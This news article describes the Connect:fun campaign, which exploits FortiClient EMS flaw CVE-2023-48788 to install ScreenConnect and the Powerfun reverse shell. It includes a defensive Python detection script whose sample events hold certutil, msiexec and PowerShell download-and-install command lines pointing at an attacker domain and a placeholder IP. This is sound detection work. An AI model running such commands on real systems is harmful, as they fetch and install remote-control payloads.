Cybersecurity experts have identified a new attack campaign that exploits a recently disclosed vulnerability in Fortinet FortiClient EMS, using ScreenConnect and Metasploit's Powerfun payload for post-exploitation.

This campaign targets CVE-2023-48788, a critical SQL injection vulnerability with a CVSS score of 9.3. This flaw enables unauthorized attackers to execute commands or code on the affected systems through carefully crafted requests, emphasizing the urgent need for mitigations.

Forescout, a cybersecurity firm, has labeled this operation with the codename Connect:fun, highlighting the exploitation of ScreenConnect and Powerfun for post-exploitation activities. The attack was first noted against an unnamed media organization that had a vulnerable FortiClient EMS instance exposed to the internet.

The incident unfolded shortly after a proof-of-concept exploit for the vulnerability became publicly available on March 21, 2024. In the following days, the attackers attempted to exploit the flaw to download ScreenConnect and install it with the msiexec utility, although these initial attempts were unsuccessful.

However, on March 25, the attackers successfully executed PowerShell commands that fetched the Metasploit Powerfun script, initiating a reverse connection to an external IP address. This shift illustrates how the attackers adapted and refined their methods in real time.

Further analysis detected SQL queries attempting to download ScreenConnect from a remote domain, "ursketz[.]com," using certutil to perform the download. The software would then be installed via msiexec and connect to a command-and-control (C2) server.
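As an added illustration of the detection side (example code written for this article, not from Forescout or Fortinet), the following Python scans constructed process-creation events for the chain described above and for the network-monitoring advice at the end of the piece: certutil fetching a file from a URL, msiexec installing that same file, and PowerShell pulling a remote script. The SQL Server parent process, the event field names, the IP address and the file paths are assumptions; only the ursketz[.]com domain comes from the report.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events, not real telemetry. The domain is
# from the report; the host names, IP, paths and parent process are placeholders.
SAMPLE_EVENTS = [
    {"host": "ems01", "parent": "sqlservr.exe", "image": "cmd.exe",
     "cmdline": "cmd /c certutil -urlcache -split -f http://ursketz[.]com/sc.msi C:\\Temp\\sc.msi"},
    {"host": "ems01", "parent": "cmd.exe", "image": "msiexec.exe",
     "cmdline": "msiexec /i C:\\Temp\\sc.msi /quiet"},
    {"host": "ems01", "parent": "sqlservr.exe", "image": "powershell.exe",
     "cmdline": "powershell -nop -c (New-Object Net.WebClient).DownloadString('http://203.0.113.7/pf.ps1')"},
    {"host": "ws42", "parent": "explorer.exe", "image": "msiexec.exe",
     "cmdline": "msiexec /i C:\\Users\\jdoe\\Downloads\\7zip.msi"},  # benign, must not fire
]

SHELLS = {"cmd.exe", "powershell.exe", "certutil.exe"}
CERTUTIL_DL = re.compile(r"certutil.*-urlcache.*?(https?://\S+)\s+(\S+)", re.I)
MSIEXEC_INSTALL = re.compile(r"msiexec.*?/i\s+(\S+)", re.I)
PS_DOWNLOAD = re.compile(r"(DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b.*https?://", re.I)


def detect(events):
    """Return (host, finding, detail) tuples for the post-exploitation chain.

    Findings are correlated per host so that an msiexec install only fires
    when it targets a file that certutil wrote earlier on the same host.
    """
    findings = []
    downloaded = defaultdict(set)  # host -> lowercased paths written by certutil
    for ev in events:
        host, cmd = ev["host"], ev["cmdline"]
        parent, image = ev["parent"].lower(), ev["image"].lower()
        # Assumed: the SQL injection leads to the database engine spawning a shell.
        if parent == "sqlservr.exe" and image in SHELLS:
            findings.append((host, "sqlserver_spawned_shell", image))
        m = CERTUTIL_DL.search(cmd)
        if m:
            downloaded[host].add(m.group(2).lower())
            findings.append((host, "certutil_download", m.group(1)))
        m = MSIEXEC_INSTALL.search(cmd)
        if m and m.group(1).lower() in downloaded[host]:
            findings.append((host, "msiexec_installs_certutil_download", m.group(1)))
        if image == "powershell.exe" and PS_DOWNLOAD.search(cmd):
            findings.append((host, "powershell_remote_script_fetch", cmd))
    return findings
```

Run against real endpoint telemetry, the same rules would need the field names of your EDR or Sysmon export in place of the constructed dictionary keys.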

Investigators believe the threat actor may have been active since at least 2022, with a particular focus on exploiting Fortinet devices. Linguistic clues in the attackers' tooling suggest potential ties to Vietnamese and German domains.

“The activity demonstrates clear manual involvement, indicated by numerous unsuccessful attempts to acquire and install software along with an extended timeframe between efforts,” commented security researcher Sai Molige. This observation supports the notion that the campaign is distinct, rather than part of a broader automated botnet operation.

The tactical approach shares similarities with other incidents reported in March 2024 by Palo Alto Networks Unit 42 and Blumira, which also involved abuse of CVE-2023-48788 to download utilities such as ScreenConnect and Atera. Organizations are urged to apply Fortinet's patches to guard against exploitation and to monitor network traffic for signs of abnormal activity. Deploying a web application firewall (WAF) is also recommended to help block potentially harmful requests.
